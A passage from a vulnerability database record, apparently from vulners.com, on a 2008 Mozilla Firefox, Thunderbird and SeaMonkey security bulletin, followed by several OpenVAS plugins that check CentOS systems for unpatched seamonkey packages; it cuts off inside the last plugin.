ID SECURITYVULNS:VULN:9310
Type securityvulns
Reporter BUGTRAQ
Modified 2008-09-30T00:00:00
Description
Memory corruptions, privilege escalation, crossite scripting, DoS, buffer overflow
{"id": "SECURITYVULNS:VULN:9310", "bulletinFamily": "software", "title": "Mozilla Firefox / Thunderbird / Seamonkey multiple security vulnerabilities", "description": "Memory corruptions, privilege escalation, crossite scripting, DoS, buffer overflow", "published": "2008-09-30T00:00:00", "modified": "2008-09-30T00:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:9310", "reporter": "BUGTRAQ", "references": ["https://vulners.com/securityvulns/securityvulns:doc:20581", "https://vulners.com/securityvulns/securityvulns:doc:20584", "https://vulners.com/securityvulns/securityvulns:doc:20576", "https://vulners.com/securityvulns/securityvulns:doc:20582", "https://vulners.com/securityvulns/securityvulns:doc:20577", "https://vulners.com/securityvulns/securityvulns:doc:20613", "https://vulners.com/securityvulns/securityvulns:doc:20579", "https://vulners.com/securityvulns/securityvulns:doc:20585", "https://vulners.com/securityvulns/securityvulns:doc:20583", "https://vulners.com/securityvulns/securityvulns:doc:20578", "https://vulners.com/securityvulns/securityvulns:doc:20580"], "cvelist": ["CVE-2008-3835", "CVE-2008-4070", "CVE-2008-4067", "CVE-2008-3836", "CVE-2008-4066", "CVE-2008-4069", "CVE-2008-0016", "CVE-2008-4059", "CVE-2008-3837", "CVE-2008-4062", "CVE-2008-4060", "CVE-2008-4058", "CVE-2008-4068", "CVE-2008-4061", "CVE-2008-4065"], "type": "securityvulns", "lastseen": "2018-08-31T11:09:30", "history": [], "edition": 1, "hashmap": [{"key": "affectedSoftware", "hash": "dda5c8a799353a2a1582b5fbbfaa247b"}, {"key": "bulletinFamily", "hash": "f9fa10ba956cacf91d7878861139efb9"}, {"key": "cvelist", "hash": "add97086c5393af80e4e2901dccc82eb"}, {"key": "cvss", "hash": "2bdabeb49c44761f9565717ab0e38165"}, {"key": "description", "hash": "1b7b8b0cd1a1febf73d0bdc9b748a76d"}, {"key": "href", "hash": "38b889f02702b01542a847efcf92babc"}, {"key": "modified", "hash": "64c0a538c7b9d69e5ae08251df8c9721"}, {"key": "published", "hash": "64c0a538c7b9d69e5ae08251df8c9721"}, {"key": "references", "hash": "35852bb33895990780cff557da79ee8f"}, {"key": "reporter", "hash": "2c5cca82a8670da097919f6160833daf"}, {"key": "title", "hash": "02e82c137c297d43fa24b8c79f6ea1bb"}, {"key": "type", "hash": "d54751dd75af2ea0147b462b3e001cd0"}], "hash": "0ba07ac6a92601b8df5ab77e550fb0c268e89d022102331db084823dc202878f", "viewCount": 0, "enchantments": {"score": {"value": 9.3, "vector": "NONE", "modified": "2018-08-31T11:09:30"}, "vulnersScore": 9.3}, "objectVersion": "1.3", "affectedSoftware": [{"name": "Firefox", "operator": "eq", "version": "2.0"}, {"name": "SeaMonkey", "operator": "eq", "version": "1.1"}, {"name": "Firefox", "operator": "eq", "version": "3.0"}, {"name": "Thunderbird", "operator": "eq", "version": "2.0"}]}
{"openvas": [{"lastseen": "2017-07-25T10:56:18", "references": ["2008:0882", "http://lists.centos.org/pipermail/centos-announce/2008-September/015268.html"], "pluginID": "880265", "description": "Check for the Version of seamonkey", "edition": 2, "reporter": "Copyright (C) 2009 Greenbone Networks GmbH", "published": "2009-02-27T00:00:00", "title": "CentOS Update for seamonkey CESA-2008:0882 centos3 i386", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 9.3}}, "naslFamily": "CentOS Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-3835", "CVE-2008-4067", "CVE-2008-4066", "CVE-2008-4069", "CVE-2008-0016", "CVE-2008-4059", "CVE-2008-3837", "CVE-2008-4062", "CVE-2008-4060", "CVE-2008-4058", "CVE-2008-4068", "CVE-2008-4061", "CVE-2008-4065"], "modified": "2017-07-10T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=880265", "id": "OPENVAS:880265", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for seamonkey CESA-2008:0882 centos3 i386\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"SeaMonkey is an open source Web browser, advanced email and newsgroup\n client, IRC chat client, and HTML editor.\n\n Several flaws were found in the processing of malformed web content. A web\n page containing malicious content could cause SeaMonkey to crash or,\n potentially, execute arbitrary code as the user running SeaMonkey.\n (CVE-2008-0016, CVE-2008-4058, CVE-2008-4059, CVE-2008-4060, CVE-2008-4061,\n CVE-2008-4062)\n \n Several flaws were found in the way malformed web content was displayed. A\n web page containing specially crafted content could potentially trick a\n SeaMonkey user into surrendering sensitive information. (CVE-2008-3835,\n CVE-2008-4067, CVE-2008-4068, CVE-2008-4069)\n \n A flaw was found in the way SeaMonkey handles mouse click events. A web page\n containing specially crafted JavaScript code could move the content window\n while a mouse-button was pressed, causing any item under the pointer to be\n dragged. This could, potentially, cause the user to perform an unsafe\n drag-and-drop action. (CVE-2008-3837)\n \n A flaw was found in SeaMonkey that caused certain characters to be stripped\n from JavaScript code. This flaw could allow malicious JavaScript to bypass\n or evade script filters. (CVE-2008-4065, CVE-2008-4066)\n \n All SeaMonkey users should upgrade to these updated packages, which contain\n backported patches to resolve these issues.\";\n\ntag_affected = \"seamonkey on CentOS 3\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.centos.org/pipermail/centos-announce/2008-September/015268.html\");\n script_id(880265);\n script_version(\"$Revision: 6651 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 13:45:21 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-02-27 09:02:20 +0100 (Fri, 27 Feb 2009)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"CESA\", value: \"2008:0882\");\n script_cve_id(\"CVE-2008-0016\", \"CVE-2008-3835\", \"CVE-2008-3837\", \"CVE-2008-4058\", \"CVE-2008-4059\", \"CVE-2008-4060\", \"CVE-2008-4061\", \"CVE-2008-4062\", \"CVE-2008-4065\", \"CVE-2008-4066\", \"CVE-2008-4067\", \"CVE-2008-4068\", \"CVE-2008-4069\");\n script_name( \"CentOS Update for seamonkey CESA-2008:0882 centos3 i386\");\n\n script_summary(\"Check for the Version of seamonkey\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"CentOS3\")\n{\n\n if ((res = isrpmvuln(pkg:\"seamonkey\", rpm:\"seamonkey~1.0.9~0.24.el3.centos3\", rls:\"CentOS3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"seamonkey-chat\", rpm:\"seamonkey-chat~1.0.9~0.24.el3.centos3\", rls:\"CentOS3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"seamonkey-devel\", rpm:\"seamonkey-devel~1.0.9~0.24.el3.centos3\", rls:\"CentOS3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"seamonkey-dom-inspector\", rpm:\"seamonkey-dom-inspector~1.0.9~0.24.el3.centos3\", rls:\"CentOS3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"seamonkey-js-debugger\", rpm:\"seamonkey-js-debugger~1.0.9~0.24.el3.centos3\", rls:\"CentOS3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"seamonkey-mail\", rpm:\"seamonkey-mail~1.0.9~0.24.el3.centos3\", rls:\"CentOS3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"seamonkey-nspr\", rpm:\"seamonkey-nspr~1.0.9~0.24.el3.centos3\", rls:\"CentOS3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"seamonkey-nspr-devel\", rpm:\"seamonkey-nspr-devel~1.0.9~0.24.el3.centos3\", rls:\"CentOS3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"seamonkey-nss\", rpm:\"seamonkey-nss~1.0.9~0.24.el3.centos3\", rls:\"CentOS3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"seamonkey-nss-devel\", rpm:\"seamonkey-nss-devel~1.0.9~0.24.el3.centos3\", rls:\"CentOS3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-25T10:56:31", "references": ["2008:0882", "http://lists.centos.org/pipermail/centos-announce/2008-September/015269.html"], "pluginID": "880139", "description": "Check for the Version of seamonkey", "edition": 2, "reporter": "Copyright (C) 2009 Greenbone Networks GmbH", "published": "2009-02-27T00:00:00", "title": "CentOS Update for seamonkey CESA-2008:0882 centos3 x86_64", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 9.3}}, "naslFamily": "CentOS Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-3835", "CVE-2008-4067", "CVE-2008-4066", "CVE-2008-4069", "CVE-2008-0016", "CVE-2008-4059", "CVE-2008-3837", "CVE-2008-4062", "CVE-2008-4060", "CVE-2008-4058", "CVE-2008-4068", "CVE-2008-4061", "CVE-2008-4065"], "modified": "2017-07-10T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=880139", "id": "OPENVAS:880139", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for seamonkey CESA-2008:0882 centos3 x86_64\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"SeaMonkey is an open source Web browser, advanced email and newsgroup\n client, IRC chat client, and HTML editor.\n\n Several flaws were found in the processing of malformed web content. A web\n page containing malicious content could cause SeaMonkey to crash or,\n potentially, execute arbitrary code as the user running SeaMonkey.\n (CVE-2008-0016, CVE-2008-4058, CVE-2008-4059, CVE-2008-4060, CVE-2008-4061,\n CVE-2008-4062)\n \n Several flaws were found in the way malformed web content was displayed. A\n web page containing specially crafted content could potentially trick a\n SeaMonkey user into surrendering sensitive information. (CVE-2008-3835,\n CVE-2008-4067, CVE-2008-4068, CVE-2008-4069)\n \n A flaw was found in the way SeaMonkey handles mouse click events. A web page\n containing specially crafted JavaScript code could move the content window\n while a mouse-button was pressed, causing any item under the pointer to be\n dragged. This could, potentially, cause the user to perform an unsafe\n drag-and-drop action. (CVE-2008-3837)\n \n A flaw was found in SeaMonkey that caused certain characters to be stripped\n from JavaScript code. This flaw could allow malicious JavaScript to bypass\n or evade script filters. (CVE-2008-4065, CVE-2008-4066)\n \n All SeaMonkey users should upgrade to these updated packages, which contain\n backported patches to resolve these issues.\";\n\ntag_affected = \"seamonkey on CentOS 3\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.centos.org/pipermail/centos-announce/2008-September/015269.html\");\n script_id(880139);\n script_version(\"$Revision: 6651 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 13:45:21 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-02-27 09:02:20 +0100 (Fri, 27 Feb 2009)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"CESA\", value: \"2008:0882\");\n script_cve_id(\"CVE-2008-0016\", \"CVE-2008-3835\", \"CVE-2008-3837\", \"CVE-2008-4058\", \"CVE-2008-4059\", \"CVE-2008-4060\", \"CVE-2008-4061\", \"CVE-2008-4062\", \"CVE-2008-4065\", \"CVE-2008-4066\", \"CVE-2008-4067\", \"CVE-2008-4068\", \"CVE-2008-4069\");\n script_name( \"CentOS Update for seamonkey CESA-2008:0882 centos3 x86_64\");\n\n script_summary(\"Check for the Version of seamonkey\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"CentOS3\")\n{\n\n if ((res = isrpmvuln(pkg:\"seamonkey\", rpm:\"seamonkey~1.0.9~0.24.el3.centos3\", rls:\"CentOS3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"seamonkey-chat\", rpm:\"seamonkey-chat~1.0.9~0.24.el3.centos3\", rls:\"CentOS3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"seamonkey-devel\", rpm:\"seamonkey-devel~1.0.9~0.24.el3.centos3\", rls:\"CentOS3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"seamonkey-dom-inspector\", rpm:\"seamonkey-dom-inspector~1.0.9~0.24.el3.centos3\", rls:\"CentOS3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"seamonkey-js-debugger\", rpm:\"seamonkey-js-debugger~1.0.9~0.24.el3.centos3\", rls:\"CentOS3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"seamonkey-mail\", rpm:\"seamonkey-mail~1.0.9~0.24.el3.centos3\", rls:\"CentOS3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"seamonkey-nspr\", rpm:\"seamonkey-nspr~1.0.9~0.24.el3.centos3\", rls:\"CentOS3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"seamonkey-nspr-devel\", rpm:\"seamonkey-nspr-devel~1.0.9~0.24.el3.centos3\", rls:\"CentOS3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"seamonkey-nss\", rpm:\"seamonkey-nss~1.0.9~0.24.el3.centos3\", rls:\"CentOS3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"seamonkey-nss-devel\", rpm:\"seamonkey-nss-devel~1.0.9~0.24.el3.centos3\", rls:\"CentOS3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-25T10:57:12", "references": ["2008:0882-01", "http://lists.centos.org/pipermail/centos-announce/2008-September/015270.html"], "pluginID": "880241", "description": "Check for the Version of seamonkey", "edition": 2, "reporter": "Copyright (C) 2009 Greenbone Networks GmbH", "published": "2009-02-27T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 9.3}}, "title": "CentOS Update for seamonkey CESA-2008:0882-01 centos2 i386", "type": "openvas", "naslFamily": "CentOS Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-3835", "CVE-2008-4067", "CVE-2008-4066", "CVE-2008-4069", "CVE-2008-0016", "CVE-2008-4059", "CVE-2008-3837", "CVE-2008-4062", "CVE-2008-4060", "CVE-2008-4058", "CVE-2008-4068", "CVE-2008-4061", "CVE-2008-4065"], "modified": "2017-07-10T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=880241", "id": "OPENVAS:880241", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for seamonkey CESA-2008:0882-01 centos2 i386\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"SeaMonkey is an open source Web browser, advanced email and newsgroup\n client, IRC chat client, and HTML editor.\n\n Several flaws were found in the processing of malformed web content. A web\n page containing malicious content could cause SeaMonkey to crash or,\n potentially, execute arbitrary code as the user running SeaMonkey.\n (CVE-2008-0016, CVE-2008-4058, CVE-2008-4059, CVE-2008-4060, CVE-2008-4061,\n CVE-2008-4062)\n \n Several flaws were found in the way malformed web content was displayed. A\n web page containing specially crafted content could potentially trick a\n SeaMonkey user into surrendering sensitive information. (CVE-2008-3835,\n CVE-2008-4067, CVE-2008-4068, CVE-2008-4069)\n \n A flaw was found in the way SeaMonkey handles mouse click events. A web page\n containing specially crafted JavaScript code could move the content window\n while a mouse-button was pressed, causing any item under the pointer to be\n dragged. This could, potentially, cause the user to perform an unsafe\n drag-and-drop action. (CVE-2008-3837)\n \n A flaw was found in SeaMonkey that caused certain characters to be stripped\n from JavaScript code. This flaw could allow malicious JavaScript to bypass\n or evade script filters. (CVE-2008-4065, CVE-2008-4066)\n \n All SeaMonkey users should upgrade to these updated packages, which contain\n backported patches to resolve these issues.\";\n\ntag_affected = \"seamonkey on CentOS 2\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.centos.org/pipermail/centos-announce/2008-September/015270.html\");\n script_id(880241);\n script_version(\"$Revision: 6651 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 13:45:21 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-02-27 09:02:20 +0100 (Fri, 27 Feb 2009)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"CESA\", value: \"2008:0882-01\");\n script_cve_id(\"CVE-2008-0016\", \"CVE-2008-3835\", \"CVE-2008-3837\", \"CVE-2008-4058\", \"CVE-2008-4059\", \"CVE-2008-4060\", \"CVE-2008-4061\", \"CVE-2008-4062\", \"CVE-2008-4065\", \"CVE-2008-4066\", \"CVE-2008-4067\", \"CVE-2008-4068\", \"CVE-2008-4069\");\n script_name( \"CentOS Update for seamonkey CESA-2008:0882-01 centos2 i386\");\n\n script_summary(\"Check for the Version of seamonkey\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"CentOS2\")\n{\n\n if ((res = isrpmvuln(pkg:\"seamonkey\", rpm:\"seamonkey~1.0.9~0.20.el2.c2.1\", rls:\"CentOS2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"seamonkey-chat\", rpm:\"seamonkey-chat~1.0.9~0.20.el2.c2.1\", rls:\"CentOS2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"seamonkey-devel\", rpm:\"seamonkey-devel~1.0.9~0.20.el2.c2.1\", rls:\"CentOS2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"seamonkey-dom-inspector\", rpm:\"seamonkey-dom-inspector~1.0.9~0.20.el2.c2.1\", rls:\"CentOS2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"seamonkey-js-debugger\", rpm:\"seamonkey-js-debugger~1.0.9~0.20.el2.c2.1\", rls:\"CentOS2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"seamonkey-mail\", rpm:\"seamonkey-mail~1.0.9~0.20.el2.c2.1\", rls:\"CentOS2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"seamonkey-nspr\", rpm:\"seamonkey-nspr~1.0.9~0.20.el2.c2.1\", rls:\"CentOS2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"seamonkey-nspr-devel\", rpm:\"seamonkey-nspr-devel~1.0.9~0.20.el2.c2.1\", rls:\"CentOS2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"seamonkey-nss\", rpm:\"seamonkey-nss~1.0.9~0.20.el2.c2.1\", rls:\"CentOS2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"seamonkey-nss-devel\", rpm:\"seamonkey-nss-devel~1.0.9~0.20.el2.c2.1\", rls:\"CentOS2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-04-09T11:39:53", "references": ["2008:0882", "http://lists.centos.org/pipermail/centos-announce/2008-September/015269.html"], "pluginID": "1361412562310880139", "description": "Check for the Version of seamonkey", "edition": 2, "reporter": "Copyright (C) 2009 Greenbone Networks GmbH", "published": "2009-02-27T00:00:00", "title": "CentOS Update for seamonkey CESA-2008:0882 centos3 x86_64", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 9.3}}, "naslFamily": "CentOS Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-3835", "CVE-2008-4067", "CVE-2008-4066", "CVE-2008-4069", "CVE-2008-0016", "CVE-2008-4059", "CVE-2008-3837", "CVE-2008-4062", "CVE-2008-4060", "CVE-2008-4058", "CVE-2008-4068", "CVE-2008-4061", "CVE-2008-4065"], "modified": "2018-04-06T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310880139", "id": "OPENVAS:1361412562310880139", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for seamonkey CESA-2008:0882 centos3 x86_64\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"SeaMonkey is an open source Web browser, advanced email and newsgroup\n client, IRC chat client, and HTML editor.\n\n Several flaws were found in the processing of malformed web content. A web\n page containing malicious content could cause SeaMonkey to crash or,\n potentially, execute arbitrary code as the user running SeaMonkey.\n (CVE-2008-0016, CVE-2008-4058, CVE-2008-4059, CVE-2008-4060, CVE-2008-4061,\n CVE-2008-4062)\n \n Several flaws were found in the way malformed web content was displayed. A\n web page containing specially crafted content could potentially trick a\n SeaMonkey user into surrendering sensitive information. (CVE-2008-3835,\n CVE-2008-4067, CVE-2008-4068, CVE-2008-4069)\n \n A flaw was found in the way SeaMonkey handles mouse click events. A web page\n containing specially crafted JavaScript code could move the content window\n while a mouse-button was pressed, causing any item under the pointer to be\n dragged. This could, potentially, cause the user to perform an unsafe\n drag-and-drop action. (CVE-2008-3837)\n \n A flaw was found in SeaMonkey that caused certain characters to be stripped\n from JavaScript code. This flaw could allow malicious JavaScript to bypass\n or evade script filters. (CVE-2008-4065, CVE-2008-4066)\n \n All SeaMonkey users should upgrade to these updated packages, which contain\n backported patches to resolve these issues.\";\n\ntag_affected = \"seamonkey on CentOS 3\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.centos.org/pipermail/centos-announce/2008-September/015269.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.880139\");\n script_version(\"$Revision: 9370 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 10:53:14 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-02-27 09:02:20 +0100 (Fri, 27 Feb 2009)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"CESA\", value: \"2008:0882\");\n script_cve_id(\"CVE-2008-0016\", \"CVE-2008-3835\", \"CVE-2008-3837\", \"CVE-2008-4058\", \"CVE-2008-4059\", \"CVE-2008-4060\", \"CVE-2008-4061\", \"CVE-2008-4062\", \"CVE-2008-4065\", \"CVE-2008-4066\", \"CVE-2008-4067\", \"CVE-2008-4068\", \"CVE-2008-4069\");\n script_name( \"CentOS Update for seamonkey CESA-2008:0882 centos3 x86_64\");\n\n script_tag(name:\"summary\", value:\"Check for the Version of seamonkey\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"CentOS3\")\n{\n\n if ((res = 